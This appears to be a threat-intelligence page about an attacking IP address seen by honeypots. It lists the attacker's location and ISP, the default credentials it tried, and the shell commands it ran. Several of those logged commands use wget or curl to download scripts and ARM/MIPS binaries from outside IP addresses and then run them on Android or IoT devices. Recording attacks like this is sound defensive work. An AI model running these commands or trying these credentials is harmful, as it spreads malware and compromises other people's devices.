โš TROYANOSYVIRUS
Active Threat โ€ข HIGH

176.65.139.41

First Detection2/15/2026
Last Activity2/25/2026
ISPPfcloud UG (haftungsbeschrankt)
๐ŸŽฏ
231
Total Attacks
๐Ÿ”Œ
3
Ports
๐Ÿ“ก
3
Attack Types
๐Ÿฆ 
1
Malware

Geolocation

Country
๐Ÿ‡ฉ๐Ÿ‡ช Germany
City
Unknown
ASN
AS51396
ISP
Pfcloud UG (haftungsbeschrankt)

Attack Types

cowrie
honeyaml
adbhoney

Attacked Ports

23805555

Associated Malware

8a6ec7b5e46a3a9e5ee8...โ†’

Attempted Credentials

๐Ÿ”root/admin
5x
๐Ÿ”root/password
1x
๐Ÿ”hikvision/hikvision
1x

Executed Commands

$echo hello26x
$cd /data/local/tmp/; wget http://140.233.190.82/cat.sh || curl http://140.233.190.82/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android11x
$cd /data/local/tmp/; wget http://130.12.180.78/manji.arm7 -O manji.arm7 || busybox wget http://130.12.180.78/manji.arm7 -O manji.arm7; chmod 777 manji.arm7; ./manji.arm7 || wget http://130.12.180.78/manji.mips -O manji.mips || busybox wget http://130.12.180.78/manji.mips -O manji.mips; chmod 777 manji.mips; ./manji.mips5x
$./2x
$/bin/busybox TEST1x
$cd /data/local/tmp/; busybox wget http://140.233.190.82/cat.sh; sh cat.sh; curl http://140.233.190.82/cat.sh; sh cat.sh; wget http://140.233.190.82/cat.sh; sh cat.sh; curl http://140.233.190.82/cat.sh; sh cat.sh; busybox wget http://140.233.190.82/cat.sh; sh cat.sh; busybox curl http://140.233.190.82/cat.sh; sh cat.sh1x
$echo SHELL_TEST1x
$cat /proc1x

Risk Assessment

70
/100
LowMediumHighCritical